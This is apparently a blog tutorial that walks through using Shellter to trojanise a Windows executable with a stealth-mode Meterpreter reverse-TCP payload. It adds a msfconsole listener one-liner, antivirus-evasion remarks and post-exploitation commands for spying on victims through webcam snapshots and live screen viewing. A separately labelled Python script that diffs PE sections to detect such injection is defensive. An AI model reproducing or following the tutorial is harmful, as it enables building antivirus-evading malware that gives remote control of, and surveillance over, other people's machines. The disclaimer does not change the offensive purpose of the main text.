Hello all. Let’s make some malware.
You heard me, we’re gonna make malware today.
Let’s go!
Now that I have your attention: today we’re going to talk about Shellter. Shellter is a shellcode injection tool. It takes an existing executable and modifies it so that it executes the code you choose. So, yes, it makes malware.
Shellter is dynamic: each injection is unique. It is inspired by Entry Point Obscuring (EPO) viruses.
What you will need:
- Metasploit installed (preferably on Linux)
- Wine (if running strictly from Linux: sudo apt install wine32)
- A WINDOWS executable file (can be anything you download from the internet; countdown.exe from my Tor site under ‘programs’ will do nicely)
- Shellter installed (on either OS)
- Your Windows AV turned off (unless you’re running Malwarebytes 😱)
First things first, launch Shellter.
Press A for automatic mode.
Next, Shellter will ask for a PE target, you will then provide the path to the executable that you are trying to inject. I ran this through WSL, so I had to provide a pretty funky path.
Next, Shellter will try to run the executable to deduce a good position by tracing through instructions and picking a random one. This will take about a minute.
Shellter will then ask if you want Stealth Mode. Stealth Mode means that the executable will run as normal, and anyone who runs the .exe will notice no changes in it. If Stealth Mode is turned off, the executable will not run when someone tries to execute it (aka LOUD malware). If you select Stealth Mode, your payload can die when the .exe finishes execution; if you don’t, you won’t have that issue.
I’m going to go with Yes.
After selecting Stealth Mode, you are prompted with payloads. Payloads are the malicious code that is injected into the .exe. We’ll go with Meterpreter Reverse TCP. The cool thing about Shellter is that you can write and inject your own, custom payloads!
Enter L. Then 1.
Next is LHOST aka “Listening Host”. Unless you plan on siccing this malware on your friends, keep it localhost (127.0.0.1).
Then LPORT aka “Listening Port”. Pick a random port (I picked 4545).
If you did it right, you should see Injection: Verified!
Press Enter, and voilà! You have malware on your machine.
For fun, let’s toss the malware into VirusTotal. Here is my copy, but yours will be different, obviously. Yes, it gets caught by a bunch of anti-virus tools, but look closely…
Malwarebytes is one of the most commonly used free anti-virus programs, and it doesn’t catch this easily-made malware.
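Added example, not part of the original post: a Python script that compares a suspect PE against a known-good copy of the same executable, section by section, and reports where bytes changed, since an EPO-style injection of the kind described above leaves AddressOfEntryPoint untouched and a signature scan can miss it. Both sample files are constructed in the script from a minimal, non-loadable PE header, and CLEAN_TEXT and SUSPECT_TEXT are made-up byte strings, not real code.

```python
import struct
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes

def parse_pe(data: bytes) -> dict:
    """Return the AddressOfEntryPoint RVA and the raw bytes of every section."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]                 # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4                                                # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    entry = struct.unpack_from("<I", data, coff + 20 + 16)[0]        # AddressOfEntryPoint
    sections, hdr = {}, coff + 20 + opt_size                         # first section header
    for _ in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = SECTION_HDR.unpack_from(data, hdr)[:5]
        sections[name.rstrip(b"\0").decode()] = data[raw_ptr:raw_ptr + raw_size]
        hdr += SECTION_HDR.size
    return {"entry": entry, "sections": sections}

def diff_pe(clean: bytes, suspect: bytes) -> dict:
    """Compare a known-good PE with a suspect copy; report changed sections and entry point."""
    a, b = parse_pe(clean), parse_pe(suspect)
    modified = {}
    for name, raw in a["sections"].items():
        other = b["sections"].get(name, b"")
        changed = [i for i, (x, y) in enumerate(zip(raw, other)) if x != y]
        if changed or len(raw) != len(other):
            modified[name] = {"first_offset": changed[0] if changed else min(len(raw), len(other)),
                              "bytes_changed": len(changed) + abs(len(raw) - len(other))}
    return {"entry_changed": a["entry"] != b["entry"], "modified": modified,
            "added_sections": sorted(set(b["sections"]) - set(a["sections"]))}

def build_sample_pe(text: bytes) -> bytes:
    """Constructed minimal PE32 with one .text section (header only, not loadable; demo input)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                    # e_lfanew = 64
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, 0x1000)          # ... AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    raw_ptr = len(dos) + 4 + len(coff) + len(opt) + SECTION_HDR.size
    sect = SECTION_HDR.pack(b".text", len(text), 0x1000, len(text), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + sect + text

# Constructed sample: same header and entry point, four bytes replaced in the middle of .text.
CLEAN_TEXT = bytes.fromhex("5589e583ec1090909090c9c3")
SUSPECT_TEXT = CLEAN_TEXT[:6] + bytes.fromhex("deadbeef") + CLEAN_TEXT[10:]

def demo() -> dict:
    return diff_pe(build_sample_pe(CLEAN_TEXT), build_sample_pe(SUSPECT_TEXT))
```

In practice the known-good copy is the vendor’s original download or a hash-verified archive copy of the same build.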
Let’s look back at the payload we selected. We went with Meterpreter Reverse TCP. This is what is called a “reverse shell”. In a typical shell session, a user asks for a shell from a remote server (think SSH). However, in a reverse shell session, the server opens a shell and asks a client for the connection.
We already set up the LHOST and LPORT. Now we need a shell listener on our client (attacker) machine.
Metasploit will get us our Meterpreter session. A quick one-liner for this is:
sudo msfconsole -x "use multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4545; exploit"
Now you have a reverse shell listener on your attacker machine.
All you need to do now is run the .exe!
Now you have a Meterpreter session open.
Meterpreter
Meterpreter is a shell on steroids. If you want a glimpse at what you can accomplish, just enter ‘?’.
Since your session will die if the .exe finishes, you should migrate to another process that won’t die anytime soon. Use ps to list processes, and migrate to move into the process you want.
Here are some fun commands you can try:
- kill <pid> – Kill a process by its ID
- webcam_snap – Take a webcam photo and download it
- screenshare – Watch the user’s screen in real time
- shutdown – Shut down the ‘sploited machine
- shell – If the machine has a CD drive, run this first, then: powershell (New-Object -com "WMPlayer.OCX.7").cdromcollection.item(0).eject()
Within Meterpreter, you can even run Metasploit post exploitation tools. The sky’s the limit!
This should be obvious, but please don’t do anything illegal with what I’ve mentioned above. I am not responsible if you get caught. If you do get caught, I will make fun of you. Publicly.
Go!
-BowTiedCrawfish